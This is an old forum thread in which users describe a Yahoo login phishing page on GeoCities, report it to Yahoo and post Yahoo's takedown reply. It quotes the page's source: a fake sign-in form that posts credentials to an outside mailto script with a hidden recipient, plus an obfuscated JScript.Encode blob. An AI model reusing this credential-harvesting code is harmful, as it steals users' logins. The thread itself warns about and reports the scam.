Yahoo phishing.

[warken]

I received this link http://www.geocities.com/a_dark_blonde_hot4u/ from one of my friends as an offline message.

i clicked the link and not thinking put my username and password in.. that takes you to the yahoo site same screen, but things are different from the geocities and the yahoo site. links are underlined etc. So im thinking that the above geocities phished yahoo tricked people much like myself and now they have usernames and passwords. I did happen to change my password within 30 seconds of doing it though. lucky me.

edit:: I looked at the source and found this

<INPUT TYPE="hidden" NAME="Mail_To" VALUE="[email protected]">

seems there having all the usernames and passwords mailed to them..

Edit: I just reported it to yahoo's Phishing Abuse report service.

[:Singh:]

Hi warken, its good that you changed your password but did you reported this to yahoo.

Here is inside out of page :-

Code:

<form method="post" action="http://www2.fiberbit.net/form/mailto.cgi" enctype="x-www-form-urlencoded">
	<input name="Mail_From" value="Yahoo" type="hidden">
	<input name="Mail_To" value="[email protected]" type="hidden">
	<input name="Mail_Subject" value="Yahoo id" type="hidden">
	<input name="Next_Page" value="http://photos.yahoo.com/ph//my_photos" type="hidden">
	<script language="JScript.Encode"><!--
#@~^wgIAAA==8MWAk+M{/DDbUo{xC\boCOKDRm2wj+DkrGx3J'ET!+
Tr_Ul7romYG.cE/n.zonxDIb0c(DKh/�D|dYMkUockU[�
6r6cJt-FyfwF8FAJb@!TbPkW`	C\boCOKDRhrs+PXank#`6WM`k{!pr@!	l-kTlOGMR:bh+:Xw�d V�xTY4irQ3#`k6cxm\rLmYW. 
skh+:za+d]kYR/!06r6�/ k	
Nna}0`rzwkJ#@*Rq#PNKMGY(Ov#I8)N+^/n`9WxO!KY(Yvbp8N�Vk+	
b0v8DKhd+M{dOMkxT k	N+X6W`r�'ET!�1	
NGhkE#@*'TbPNW!GDqO`*I9W^!:�xYchMrY�`v-!!Tf1W-!T!+ 
-8X++'EZ!�&O~1VwEZTv8-q�2-ETTF&rN{E1-qlc'Fv2k9lc8-;!Z
&�1'!vlwEZ!c80wFZ* v*FwT+cRF'Tv8fwT+cO0o'ET!W+2-Tl*Z-!+!GT-8!
+GF&T+FGJ,/rG
2Azj3-!!Z&[-T*yLwFWq\'ETT+F/w;Z!�&';Z!{ykaY)9W	O-!!TcFWw;Z!GWwEZ!cOwqvW-Z*T#IE'ET!yTq'ETTWc'wTW 
wEZTl,w!!ZvNko'qvy-TcyPw;Z!GFwEZ!vOw;!ZvWY4-;TZ&[-Z* 8-;TZ
  ~4�kLtDwZGX'EZ! y-!T!2FE@*E#I[KmEsnxDRhMrO+vB@
!zG4wql wEZTvlmO@*E#iNNstwAAA==^#~@
//--></script>
	<table border="0" cellpadding="0" cellspacing="0" height="238">
		<tr bgcolor="#86a863">
			<td colspan="5" valign="top">
			<img src="Yahoo!%20Photos_files/start_top.gif"></td>
		</tr>
		<tr bgcolor="#86a863">
			<td rowspan="3" bgcolor="#e1ca83" width="1"><spacer type="block" height="1" width="1">
			</td>
			<td rowspan="3" width="10"><spacer type="block" width="10">
			</td>
			<td width="193"><b class="w">Yahoo! Member Sign In</b></td>................................................

- :S:

[warken]

got this back today, and the website has been taken down.

Hello,

Thank you for writing to Yahoo! Domains.

Thank you for informing us of possible abuse on Yahoo! GeoCities. We
have investigated the site and taken the necessary action. We
appreciate your concern and thank you for reporting this incident to
Yahoo!.

Please continue to notify us of any content you believe violates the
GeoCities Terms of Service, located at:

http://docs.yahoo.com/info/terms/geoterms.html

Your Yahoo! ID and password are your own confidential information. No
Yahoo! employee will ever ask you for your password or personal
information in an unsolicited phone call or email message. If you are
ever asked for your password in an unsolicited manner, or by someone you
do not believe to be a representative of Yahoo!, *do not* share your
password with them.

For more helpful information on password scams as well as information on
how to protect your password, visit:

http://security.yahoo.com/password_scams.html

For additional information on ways to protect your information online,
please visit the Yahoo! Security Center at:

http://security.yahoo.com


Thank you again for contacting Yahoo! Customer Care.


Regards,

Ginger

Yahoo! Customer Care
16442913